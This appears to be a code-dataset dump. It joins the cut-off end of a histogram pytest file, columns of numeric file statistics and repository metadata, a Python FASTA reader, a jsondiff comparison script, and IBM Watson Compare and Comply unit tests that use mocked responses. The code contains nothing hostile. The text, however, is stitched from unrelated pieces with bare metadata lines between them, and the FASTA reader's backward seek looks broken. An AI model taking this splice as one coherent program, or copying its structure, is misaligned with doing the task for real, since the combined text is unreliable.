assert h3.GetBinLowEdge(1) == pytest.approx(-3.14)
assert h3.GetBinWidth(1) == pytest.approx((2.71 - -3.14) / 2)
assert h3.GetBinContent(0) == pytest.approx(1)
assert h3.GetBinContent(1) == pytest.approx(2)
assert h3.GetBinContent(2) == pytest.approx(5)
assert h3.GetBinContent(3) == pytest.approx(4)
assert h3.GetBinError(0) == pytest.approx(1)
assert h3.GetBinError(1) == pytest.approx(1.4142135623730951)
assert h3.GetBinError(2) == pytest.approx(5)
assert h3.GetBinError(3) == pytest.approx(4)
f3.Close()
| 32.679803
| 88
| 0.536592
| 4,034
| 26,536
| 3.505702
| 0.050322
| 0.097157
| 0.126644
| 0.144251
| 0.91748
| 0.908217
| 0.891812
| 0.880851
| 0.872861
| 0.869962
| 0
| 0.131616
| 0.274457
| 26,536
| 811
| 89
| 32.720099
| 0.602919
| 0.003052
| 0
| 0.806407
| 0
| 0
| 0.026046
| 0.001663
| 0
| 0
| 0
| 0
| 0.253482
| 1
| 0.022284
| false
| 0
| 0.009749
| 0
| 0.032033
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0bab69de750ef31a4bc0453eff9facff070a36cc
| 2,936
|
py
|
Python
|
bin/fasta_reader.py
|
avoorhis/VAMPS-Upload-Notebook
|
8a72716293a972febc83e28203f0e8426831c72d
|
[
"MIT"
] | null | null | null |
bin/fasta_reader.py
|
avoorhis/VAMPS-Upload-Notebook
|
8a72716293a972febc83e28203f0e8426831c72d
|
[
"MIT"
] | null | null | null |
bin/fasta_reader.py
|
avoorhis/VAMPS-Upload-Notebook
|
8a72716293a972febc83e28203f0e8426831c72d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
############################################################
# #
# Simple script to read a fasta file #
# #
# #
import os
class FastaReader:
def __init__(self,file_name=None):
self.file_name = file_name
self.h = open(self.file_name)
self.seq = ''
self.id = None
self.revcomp_seq = None
self.base_counts = None
def next(self):
def read_id():
return self.h.readline().strip()[1:]
def read_seq():
ret = ''
while True:
line = self.h.readline()
while len(line) and not len(line.strip()):
# found empty line(s)
line = self.h.readline()
if not len(line):
# EOF
break
if line.startswith('>'):
# found new defline: move back to the start
self.h.seek(-len(line), os.SEEK_CUR)
break
else:
ret += line.strip()
return ret
self.id = read_id()
self.seq = read_seq()
if self.id:
return True
class FastaReaderB:
def __init__(self,file_name=None):
self.file_name = file_name
self.h = open(self.file_name, "rb")
self.seq = ''
self.id = None
self.revcomp_seq = None
self.base_counts = None
def next(self):
def read_id():
return self.h.readline().strip()[1:]
def read_seq():
ret = ''
while True:
line = self.h.readline()
while len(line) and not len(line.strip()):
# found empty line(s)
line = self.h.readline()
if not len(line):
# EOF
break
if line.startswith('>'):
# found new defline: move back to the start
print('found')
self.h.seek(-len(line), os.SEEK_CUR)
break
else:
ret += line.strip()
return ret
self.id = read_id()
self.seq = read_seq()
if self.id:
return True
if __name__ == '__main__':
f = FastaReader('test25.fa')
while f.next():
id = f.id
seq = f.seq
print(id,seq)
| 28.504854
| 63
| 0.36376
| 268
| 2,936
| 3.843284
| 0.242537
| 0.048544
| 0.069903
| 0.066019
| 0.836893
| 0.836893
| 0.836893
| 0.836893
| 0.836893
| 0.836893
| 0
| 0.0036
| 0.526907
| 2,936
| 103
| 64
| 28.504854
| 0.737941
| 0.138283
| 0
| 0.818182
| 0
| 0
| 0.010591
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121212
| false
| 0
| 0.015152
| 0.030303
| 0.257576
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f00737e7860c14cc90edb6cffe7a39edaf8e4029
| 3,187
|
py
|
Python
|
ProtoToBQ/difftest.py
|
LaurensVijnck/ProtoGen
|
6605742c6b3be2868747dbc236392b684410fc85
|
[
"MIT"
] | null | null | null |
ProtoToBQ/difftest.py
|
LaurensVijnck/ProtoGen
|
6605742c6b3be2868747dbc236392b684410fc85
|
[
"MIT"
] | 1
|
2021-03-02T09:06:08.000Z
|
2021-03-02T09:06:08.000Z
|
ProtoToBQ/difftest.py
|
LaurensVijnck/ProtoGen
|
6605742c6b3be2868747dbc236392b684410fc85
|
[
"MIT"
] | null | null | null |
from jsondiff import diff
import json
first = {".lvi.Event": {
"package": "lvi",
"filename": "event",
"ambiguous_file_name": True,
"name": "Event",
"table_root": True,
"batch_table": True,
"cluster_fields": [
"tenant_id"
],
"time_partitioning": True,
"partitioning_expiration": 0,
"partition_field": "event_time",
"table_name": "event_table",
"table_description": "ProtoToBQ generated table for events",
"fields": [
{
"index": 1,
"name": "client",
"alias": None,
"description": "Owner of the event",
"type": "TYPE_MESSAGE",
"type_value": ".lvi.Client",
"required": False,
"batch_field": False,
"clustering_field": False,
"partitioning_field": False,
"timestamp": False,
"optional_field": False,
"repeated_field": False,
"default_value": None
},
{
"index": 2,
"name": "events",
"alias": None,
"description": "",
"type": "TYPE_MESSAGE",
"type_value": ".lvi.BatchEvent",
"required": True,
"batch_field": True,
"clustering_field": False,
"partitioning_field": False,
"timestamp": False,
"optional_field": False,
"repeated_field": True,
"default_value": None
},
]
}
}
second = {".lvi.Event": {
"package": "lvi",
"filename": "event",
"ambiguous_file_name": True,
"name": "Event",
"table_root": True,
"batch_table": True,
"cluster_fields": [
"tenant_id"
],
"time_partitioning": True,
"partitioning_expiration": 0,
"partition_field": "event_time",
"table_name": "event_table",
"table_description": "ProtoToBQ generated table for events",
"fields": [
{
"index": 1,
"name": "client",
"alias": None,
"description": "Owner of the event",
"type": "TYPE_MESSAGE",
"type_value": ".lvi.Client",
"required": False,
"batch_field": False,
"clustering_field": False,
"partitioning_field": False,
"timestamp": False,
"optional_field": False,
"repeated_field": False,
"default_value": None
},
{
"index": 2,
"name": "events",
"alias": None,
"description": "",
"type": "TYPE_MESSAGE",
"type_value": ".lvi.BatchEvent",
"required": False,
"batch_field": True,
"clustering_field": False,
"partitioning_field": False,
"timestamp": False,
"optional_field": False,
"repeated_field": True,
"default_value": None
},
{
"index": 3,
"name": "events",
"alias": None,
"description": "",
"type": "TYPE_MESSAGE",
"type_value": ".lvi.BatchEvent",
"required": True,
"batch_field": True,
"clustering_field": False,
"partitioning_field": False,
"timestamp": False,
"optional_field": False,
"repeated_field": True,
"default_value": None
},
]
}
}
print(diff(first, second))
| 25.701613
| 64
| 0.528397
| 288
| 3,187
| 5.618056
| 0.190972
| 0.117429
| 0.061805
| 0.058714
| 0.954265
| 0.954265
| 0.954265
| 0.954265
| 0.954265
| 0.954265
| 0
| 0.003201
| 0.313775
| 3,187
| 124
| 65
| 25.701613
| 0.736626
| 0
| 0
| 0.818182
| 0
| 0
| 0.440088
| 0.014429
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016529
| 0
| 0.016529
| 0.008264
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f0228e344a1e472fa975b37f469a6f5dd0245bd7
| 41,781
|
py
|
Python
|
test/unit/test_compare_comply_v1.py
|
BuiQuangAnh/python-sdk
|
f9726a4f74d0a5a3ea901044af8565b4eea4d05e
|
[
"Apache-2.0"
] | null | null | null |
test/unit/test_compare_comply_v1.py
|
BuiQuangAnh/python-sdk
|
f9726a4f74d0a5a3ea901044af8565b4eea4d05e
|
[
"Apache-2.0"
] | null | null | null |
test/unit/test_compare_comply_v1.py
|
BuiQuangAnh/python-sdk
|
f9726a4f74d0a5a3ea901044af8565b4eea4d05e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# (C) Copyright IBM Corp. 2018, 2020.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from ibm_cloud_sdk_core.authenticators.no_auth_authenticator import NoAuthAuthenticator
import inspect
import json
import pytest
import responses
import tempfile
import ibm_watson.compare_comply_v1
from ibm_watson.compare_comply_v1 import *
base_url = "https://gateway.watsonplatform.net/compare-comply/api"
##############################################################################
# Start of Service: HTMLConversion
##############################################################################
# region
# -----------------------------------------------------------------------------
# Test Class for convert_to_html
# -----------------------------------------------------------------------------
class TestConvertToHtml:
# --------------------------------------------------------
# Test 1: Send fake data and check response
# --------------------------------------------------------
@responses.activate
def test_convert_to_html_response(self):
body = self.construct_full_body()
response = fake_response_HTMLReturn_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 2: Send only required fake data and check response
# --------------------------------------------------------
@responses.activate
def test_convert_to_html_required_response(self):
# Check response with required params
body = self.construct_required_body()
response = fake_response_HTMLReturn_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 3: Send empty data and check response
# --------------------------------------------------------
@responses.activate
def test_convert_to_html_empty(self):
check_empty_required_params(self, fake_response_HTMLReturn_json)
check_missing_required_params(self)
assert len(responses.calls) == 0
# -----------
# - Helpers -
# -----------
def make_url(self, body):
endpoint = "/v1/html_conversion"
url = "{0}{1}".format(base_url, endpoint)
return url
def add_mock_response(self, url, response):
responses.add(
responses.POST,
url,
body=json.dumps(response),
status=200,
content_type="application/json",
)
def call_service(self, body):
service = CompareComplyV1(
authenticator=NoAuthAuthenticator(),
version="2018-10-15",
)
service.set_service_url(base_url)
output = service.convert_to_html(**body)
return output
def construct_full_body(self):
body = {}
body["file"] = tempfile.NamedTemporaryFile()
body["file_content_type"] = "string1"
body["model"] = "string1"
return body
def construct_required_body(self):
body = {}
body["file"] = tempfile.NamedTemporaryFile()
return body
# endregion
##############################################################################
# End of Service: HTMLConversion
##############################################################################
##############################################################################
# Start of Service: ElementClassification
##############################################################################
# region
# -----------------------------------------------------------------------------
# Test Class for classify_elements
# -----------------------------------------------------------------------------
class TestClassifyElements:
# --------------------------------------------------------
# Test 1: Send fake data and check response
# --------------------------------------------------------
@responses.activate
def test_classify_elements_response(self):
body = self.construct_full_body()
response = fake_response_ClassifyReturn_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 2: Send only required fake data and check response
# --------------------------------------------------------
@responses.activate
def test_classify_elements_required_response(self):
# Check response with required params
body = self.construct_required_body()
response = fake_response_ClassifyReturn_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 3: Send empty data and check response
# --------------------------------------------------------
@responses.activate
def test_classify_elements_empty(self):
check_empty_required_params(self, fake_response_ClassifyReturn_json)
check_missing_required_params(self)
assert len(responses.calls) == 0
# -----------
# - Helpers -
# -----------
def make_url(self, body):
endpoint = "/v1/element_classification"
url = "{0}{1}".format(base_url, endpoint)
return url
def add_mock_response(self, url, response):
responses.add(
responses.POST,
url,
body=json.dumps(response),
status=200,
content_type="application/json",
)
def call_service(self, body):
service = CompareComplyV1(
authenticator=NoAuthAuthenticator(),
version="2018-10-15",
)
service.set_service_url(base_url)
output = service.classify_elements(**body)
return output
def construct_full_body(self):
body = {}
body["file"] = tempfile.NamedTemporaryFile()
body["file_content_type"] = "string1"
body["model"] = "string1"
return body
def construct_required_body(self):
body = {}
body["file"] = tempfile.NamedTemporaryFile()
return body
# endregion
##############################################################################
# End of Service: ElementClassification
##############################################################################
##############################################################################
# Start of Service: Tables
##############################################################################
# region
# -----------------------------------------------------------------------------
# Test Class for extract_tables
# -----------------------------------------------------------------------------
class TestExtractTables:
# --------------------------------------------------------
# Test 1: Send fake data and check response
# --------------------------------------------------------
@responses.activate
def test_extract_tables_response(self):
body = self.construct_full_body()
response = fake_response_TableReturn_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 2: Send only required fake data and check response
# --------------------------------------------------------
@responses.activate
def test_extract_tables_required_response(self):
# Check response with required params
body = self.construct_required_body()
response = fake_response_TableReturn_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 3: Send empty data and check response
# --------------------------------------------------------
@responses.activate
def test_extract_tables_empty(self):
check_empty_required_params(self, fake_response_TableReturn_json)
check_missing_required_params(self)
assert len(responses.calls) == 0
# -----------
# - Helpers -
# -----------
def make_url(self, body):
endpoint = "/v1/tables"
url = "{0}{1}".format(base_url, endpoint)
return url
def add_mock_response(self, url, response):
responses.add(
responses.POST,
url,
body=json.dumps(response),
status=200,
content_type="application/json",
)
def call_service(self, body):
service = CompareComplyV1(
authenticator=NoAuthAuthenticator(),
version="2018-10-15",
)
service.set_service_url(base_url)
output = service.extract_tables(**body)
return output
def construct_full_body(self):
body = {}
body["file"] = tempfile.NamedTemporaryFile()
body["file_content_type"] = "string1"
body["model"] = "string1"
return body
def construct_required_body(self):
body = {}
body["file"] = tempfile.NamedTemporaryFile()
return body
# endregion
##############################################################################
# End of Service: Tables
##############################################################################
##############################################################################
# Start of Service: Comparison
##############################################################################
# region
# -----------------------------------------------------------------------------
# Test Class for compare_documents
# -----------------------------------------------------------------------------
class TestCompareDocuments:
# --------------------------------------------------------
# Test 1: Send fake data and check response
# --------------------------------------------------------
@responses.activate
def test_compare_documents_response(self):
body = self.construct_full_body()
response = fake_response_CompareReturn_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 2: Send only required fake data and check response
# --------------------------------------------------------
@responses.activate
def test_compare_documents_required_response(self):
# Check response with required params
body = self.construct_required_body()
response = fake_response_CompareReturn_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 3: Send empty data and check response
# --------------------------------------------------------
@responses.activate
def test_compare_documents_empty(self):
check_empty_required_params(self, fake_response_CompareReturn_json)
check_missing_required_params(self)
assert len(responses.calls) == 0
# -----------
# - Helpers -
# -----------
def make_url(self, body):
endpoint = "/v1/comparison"
url = "{0}{1}".format(base_url, endpoint)
return url
def add_mock_response(self, url, response):
responses.add(
responses.POST,
url,
body=json.dumps(response),
status=200,
content_type="application/json",
)
def call_service(self, body):
service = CompareComplyV1(
authenticator=NoAuthAuthenticator(),
version="2018-10-15",
)
service.set_service_url(base_url)
output = service.compare_documents(**body)
return output
def construct_full_body(self):
body = {}
body["file_1"] = tempfile.NamedTemporaryFile()
body["file_2"] = tempfile.NamedTemporaryFile()
body["file_1_content_type"] = "string1"
body["file_2_content_type"] = "string1"
body["file_1_label"] = "string1"
body["file_2_label"] = "string1"
body["model"] = "string1"
return body
def construct_required_body(self):
body = {}
body["file_1"] = tempfile.NamedTemporaryFile()
body["file_2"] = tempfile.NamedTemporaryFile()
return body
# endregion
##############################################################################
# End of Service: Comparison
##############################################################################
##############################################################################
# Start of Service: Feedback
##############################################################################
# region
# -----------------------------------------------------------------------------
# Test Class for add_feedback
# -----------------------------------------------------------------------------
class TestAddFeedback:
# --------------------------------------------------------
# Test 1: Send fake data and check response
# --------------------------------------------------------
@responses.activate
def test_add_feedback_response(self):
body = self.construct_full_body()
response = fake_response_FeedbackReturn_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 2: Send only required fake data and check response
# --------------------------------------------------------
@responses.activate
def test_add_feedback_required_response(self):
# Check response with required params
body = self.construct_required_body()
response = fake_response_FeedbackReturn_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 3: Send empty data and check response
# --------------------------------------------------------
@responses.activate
def test_add_feedback_empty(self):
check_empty_required_params(self, fake_response_FeedbackReturn_json)
check_missing_required_params(self)
assert len(responses.calls) == 0
# -----------
# - Helpers -
# -----------
def make_url(self, body):
endpoint = "/v1/feedback"
url = "{0}{1}".format(base_url, endpoint)
return url
def add_mock_response(self, url, response):
responses.add(
responses.POST,
url,
body=json.dumps(response),
status=200,
content_type="application/json",
)
def call_service(self, body):
service = CompareComplyV1(
authenticator=NoAuthAuthenticator(),
version="2018-10-15",
)
service.set_service_url(base_url)
output = service.add_feedback(**body)
return output
def construct_full_body(self):
body = {}
body.update(
{
"feedback_data": FeedbackDataInput._from_dict(
json.loads(
"""{"feedback_type": "fake_feedback_type", "document": {"title": "fake_title", "hash": "fake_hash"}, "model_id": "fake_model_id", "model_version": "fake_model_version", "location": {"begin": 5, "end": 3}, "text": "fake_text", "original_labels": {"types": [], "categories": []}, "updated_labels": {"types": [], "categories": []}}"""
)
),
"user_id": "string1",
"comment": "string1",
}
)
return body
def construct_required_body(self):
body = {}
body.update(
{
"feedback_data": FeedbackDataInput._from_dict(
json.loads(
"""{"feedback_type": "fake_feedback_type", "document": {"title": "fake_title", "hash": "fake_hash"}, "model_id": "fake_model_id", "model_version": "fake_model_version", "location": {"begin": 5, "end": 3}, "text": "fake_text", "original_labels": {"types": [], "categories": []}, "updated_labels": {"types": [], "categories": []}}"""
)
),
"user_id": "string1",
"comment": "string1",
}
)
return body
# -----------------------------------------------------------------------------
# Test Class for list_feedback
# -----------------------------------------------------------------------------
class TestListFeedback:
# --------------------------------------------------------
# Test 1: Send fake data and check response
# --------------------------------------------------------
@responses.activate
def test_list_feedback_response(self):
body = self.construct_full_body()
response = fake_response_FeedbackList_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 2: Send only required fake data and check response
# --------------------------------------------------------
@responses.activate
def test_list_feedback_required_response(self):
# Check response with required params
body = self.construct_required_body()
response = fake_response_FeedbackList_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 3: Send empty data and check response
# --------------------------------------------------------
@responses.activate
def test_list_feedback_empty(self):
check_empty_response(self)
assert len(responses.calls) == 1
# -----------
# - Helpers -
# -----------
def make_url(self, body):
endpoint = "/v1/feedback"
url = "{0}{1}".format(base_url, endpoint)
return url
def add_mock_response(self, url, response):
responses.add(
responses.GET,
url,
body=json.dumps(response),
status=200,
content_type="application/json",
)
def call_service(self, body):
service = CompareComplyV1(
authenticator=NoAuthAuthenticator(),
version="2018-10-15",
)
service.set_service_url(base_url)
output = service.list_feedback(**body)
return output
def construct_full_body(self):
body = {
"feedback_type": "string1",
"before": datetime.now().date(),
"after": datetime.now().date(),
"document_title": "string1",
"model_id": "string1",
"model_version": "string1",
"category_removed": "string1",
"category_added": "string1",
"category_not_changed": "string1",
"type_removed": "string1",
"type_added": "string1",
"type_not_changed": "string1",
"page_limit": 12345,
"cursor": "string1",
"sort": "string1",
"include_total": True,
}
return body
def construct_required_body(self):
body = {}
return body
# -----------------------------------------------------------------------------
# Test Class for get_feedback
# -----------------------------------------------------------------------------
class TestGetFeedback:
# --------------------------------------------------------
# Test 1: Send fake data and check response
# --------------------------------------------------------
@responses.activate
def test_get_feedback_response(self):
body = self.construct_full_body()
response = fake_response_GetFeedback_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 2: Send only required fake data and check response
# --------------------------------------------------------
@responses.activate
def test_get_feedback_required_response(self):
# Check response with required params
body = self.construct_required_body()
response = fake_response_GetFeedback_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 3: Send empty data and check response
# --------------------------------------------------------
@responses.activate
def test_get_feedback_empty(self):
check_empty_required_params(self, fake_response_GetFeedback_json)
check_missing_required_params(self)
assert len(responses.calls) == 0
# -----------
# - Helpers -
# -----------
def make_url(self, body):
endpoint = "/v1/feedback/{0}".format(body["feedback_id"])
url = "{0}{1}".format(base_url, endpoint)
return url
def add_mock_response(self, url, response):
responses.add(
responses.GET,
url,
body=json.dumps(response),
status=200,
content_type="application/json",
)
def call_service(self, body):
service = CompareComplyV1(
authenticator=NoAuthAuthenticator(),
version="2018-10-15",
)
service.set_service_url(base_url)
output = service.get_feedback(**body)
return output
def construct_full_body(self):
body = {"feedback_id": "string1", "model": "string1"}
return body
def construct_required_body(self):
body = {"feedback_id": "string1"}
return body
# -----------------------------------------------------------------------------
# Test Class for delete_feedback
# -----------------------------------------------------------------------------
class TestDeleteFeedback:
# --------------------------------------------------------
# Test 1: Send fake data and check response
# --------------------------------------------------------
@responses.activate
def test_delete_feedback_response(self):
body = self.construct_full_body()
response = fake_response_FeedbackDeleted_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 2: Send only required fake data and check response
# --------------------------------------------------------
@responses.activate
def test_delete_feedback_required_response(self):
# Check response with required params
body = self.construct_required_body()
response = fake_response_FeedbackDeleted_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 3: Send empty data and check response
# --------------------------------------------------------
@responses.activate
def test_delete_feedback_empty(self):
check_empty_required_params(self, fake_response_FeedbackDeleted_json)
check_missing_required_params(self)
assert len(responses.calls) == 0
# -----------
# - Helpers -
# -----------
def make_url(self, body):
endpoint = "/v1/feedback/{0}".format(body["feedback_id"])
url = "{0}{1}".format(base_url, endpoint)
return url
def add_mock_response(self, url, response):
responses.add(
responses.DELETE,
url,
body=json.dumps(response),
status=200,
content_type="application/json",
)
def call_service(self, body):
service = CompareComplyV1(
authenticator=NoAuthAuthenticator(),
version="2018-10-15",
)
service.set_service_url(base_url)
output = service.delete_feedback(**body)
return output
def construct_full_body(self):
body = {"feedback_id": "string1", "model": "string1"}
return body
def construct_required_body(self):
body = {"feedback_id": "string1"}
return body
# endregion
##############################################################################
# End of Service: Feedback
##############################################################################
##############################################################################
# Start of Service: Batches
##############################################################################
# region
# -----------------------------------------------------------------------------
# Test Class for create_batch
# -----------------------------------------------------------------------------
class TestCreateBatch:
# --------------------------------------------------------
# Test 1: Send fake data and check response
# --------------------------------------------------------
@responses.activate
def test_create_batch_response(self):
body = self.construct_full_body()
response = fake_response_BatchStatus_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 2: Send only required fake data and check response
# --------------------------------------------------------
@responses.activate
def test_create_batch_required_response(self):
# Check response with required params
body = self.construct_required_body()
response = fake_response_BatchStatus_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 3: Send empty data and check response
# --------------------------------------------------------
@responses.activate
def test_create_batch_empty(self):
check_empty_required_params(self, fake_response_BatchStatus_json)
check_missing_required_params(self)
assert len(responses.calls) == 0
# -----------
# - Helpers -
# -----------
def make_url(self, body):
endpoint = "/v1/batches"
url = "{0}{1}".format(base_url, endpoint)
return url
def add_mock_response(self, url, response):
responses.add(
responses.POST,
url,
body=json.dumps(response),
status=200,
content_type="application/json",
)
def call_service(self, body):
service = CompareComplyV1(
authenticator=NoAuthAuthenticator(),
version="2018-10-15",
)
service.set_service_url(base_url)
output = service.create_batch(**body)
return output
def construct_full_body(self):
body = {
"function": "string1",
"input_credentials_file": tempfile.NamedTemporaryFile(),
"input_bucket_location": "string1",
"input_bucket_name": "string1",
"output_credentials_file": tempfile.NamedTemporaryFile(),
"output_bucket_location": "string1",
"output_bucket_name": "string1",
"model": "string1",
}
return body
def construct_required_body(self):
body = {
"function": "string1",
"input_credentials_file": tempfile.NamedTemporaryFile(),
"input_bucket_location": "string1",
"input_bucket_name": "string1",
"output_credentials_file": tempfile.NamedTemporaryFile(),
"output_bucket_location": "string1",
"output_bucket_name": "string1",
}
return body
# -----------------------------------------------------------------------------
# Test Class for list_batches
# -----------------------------------------------------------------------------
class TestListBatches:
# --------------------------------------------------------
# Test 1: Send fake data and check response
# --------------------------------------------------------
@responses.activate
def test_list_batches_response(self):
body = self.construct_full_body()
response = fake_response_Batches_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 2: Send only required fake data and check response
# --------------------------------------------------------
@responses.activate
def test_list_batches_required_response(self):
# Check response with required params
body = self.construct_required_body()
response = fake_response_Batches_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 3: Send empty data and check response
# --------------------------------------------------------
@responses.activate
def test_list_batches_empty(self):
check_empty_response(self)
assert len(responses.calls) == 1
# -----------
# - Helpers -
# -----------
def make_url(self, body):
endpoint = "/v1/batches"
url = "{0}{1}".format(base_url, endpoint)
return url
def add_mock_response(self, url, response):
responses.add(
responses.GET,
url,
body=json.dumps(response),
status=200,
content_type="application/json",
)
def call_service(self, body):
service = CompareComplyV1(
authenticator=NoAuthAuthenticator(),
version="2018-10-15",
)
service.set_service_url(base_url)
output = service.list_batches(**body)
return output
def construct_full_body(self):
body = {}
return body
def construct_required_body(self):
body = {}
return body
# -----------------------------------------------------------------------------
# Test Class for get_batch
# -----------------------------------------------------------------------------
class TestGetBatch:
# --------------------------------------------------------
# Test 1: Send fake data and check response
# --------------------------------------------------------
@responses.activate
def test_get_batch_response(self):
body = self.construct_full_body()
response = fake_response_BatchStatus_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 2: Send only required fake data and check response
# --------------------------------------------------------
@responses.activate
def test_get_batch_required_response(self):
# Check response with required params
body = self.construct_required_body()
response = fake_response_BatchStatus_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 3: Send empty data and check response
# --------------------------------------------------------
@responses.activate
def test_get_batch_empty(self):
check_empty_required_params(self, fake_response_BatchStatus_json)
check_missing_required_params(self)
assert len(responses.calls) == 0
# -----------
# - Helpers -
# -----------
def make_url(self, body):
endpoint = "/v1/batches/{0}".format(body["batch_id"])
url = "{0}{1}".format(base_url, endpoint)
return url
def add_mock_response(self, url, response):
responses.add(
responses.GET,
url,
body=json.dumps(response),
status=200,
content_type="application/json",
)
def call_service(self, body):
service = CompareComplyV1(
authenticator=NoAuthAuthenticator(),
version="2018-10-15",
)
service.set_service_url(base_url)
output = service.get_batch(**body)
return output
def construct_full_body(self):
body = {"batch_id": "string1"}
return body
def construct_required_body(self):
body = {"batch_id": "string1"}
return body
# -----------------------------------------------------------------------------
# Test Class for update_batch
# -----------------------------------------------------------------------------
class TestUpdateBatch:
# --------------------------------------------------------
# Test 1: Send fake data and check response
# --------------------------------------------------------
@responses.activate
def test_update_batch_response(self):
body = self.construct_full_body()
response = fake_response_BatchStatus_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 2: Send only required fake data and check response
# --------------------------------------------------------
@responses.activate
def test_update_batch_required_response(self):
# Check response with required params
body = self.construct_required_body()
response = fake_response_BatchStatus_json
send_request(self, body, response)
assert len(responses.calls) == 1
# --------------------------------------------------------
# Test 3: Send empty data and check response
# --------------------------------------------------------
@responses.activate
def test_update_batch_empty(self):
check_empty_required_params(self, fake_response_BatchStatus_json)
check_missing_required_params(self)
assert len(responses.calls) == 0
# -----------
# - Helpers -
# -----------
def make_url(self, body):
endpoint = "/v1/batches/{0}".format(body["batch_id"])
url = "{0}{1}".format(base_url, endpoint)
return url
def add_mock_response(self, url, response):
responses.add(
responses.PUT,
url,
body=json.dumps(response),
status=200,
content_type="application/json",
)
def call_service(self, body):
service = CompareComplyV1(
authenticator=NoAuthAuthenticator(),
version="2018-10-15",
)
service.set_service_url(base_url)
output = service.update_batch(**body)
return output
def construct_full_body(self):
body = {"batch_id": "string1", "action": "string1", "model": "string1"}
return body
def construct_required_body(self):
body = {"batch_id": "string1", "action": "string1"}
return body
# endregion
##############################################################################
# End of Service: Batches
##############################################################################
def check_empty_required_params(obj, response):
"""Test function to assert that the operation will throw an error when given empty required data
Args:
obj: The generated test function
"""
body = obj.construct_full_body()
body = {k: None for k in body.keys()}
error = False
try:
send_request(obj, body, response)
except ValueError as e:
error = True
assert error
def check_missing_required_params(obj):
"""Test function to assert that the operation will throw an error when missing required data
Args:
obj: The generated test function
"""
body = obj.construct_full_body()
url = obj.make_url(body)
error = False
try:
send_request(obj, {}, {}, url=url)
except TypeError as e:
error = True
assert error
def check_empty_response(obj):
"""Test function to assert that the operation will return an empty response when given an empty request
Args:
obj: The generated test function
"""
body = obj.construct_full_body()
url = obj.make_url(body)
send_request(obj, {}, {}, url=url)
def send_request(obj, body, response, url=None):
"""Test function to create a request, send it, and assert its accuracy to the mock response
Args:
obj: The generated test function
body: Dict filled with fake data for calling the service
response_str: Mock response string
"""
if not url:
url = obj.make_url(body)
obj.add_mock_response(url, response)
output = obj.call_service(body)
assert responses.calls[0].request.url.startswith(url)
assert output.get_result() == response
####################
## Mock Responses ##
####################
fake_response__json = None
fake_response_HTMLReturn_json = """{"num_pages": "fake_num_pages", "author": "fake_author", "publication_date": "fake_publication_date", "title": "fake_title", "html": "fake_html"}"""
fake_response_ClassifyReturn_json = """{"document": {"title": "fake_title", "html": "fake_html", "hash": "fake_hash", "label": "fake_label"}, "model_id": "fake_model_id", "model_version": "fake_model_version", "elements": [], "effective_dates": [], "contract_amounts": [], "termination_dates": [], "contract_types": [], "contract_terms": [], "payment_terms": [], "contract_currencies": [], "tables": [], "document_structure": {"section_titles": [], "leading_sentences": [], "paragraphs": []}, "parties": []}"""
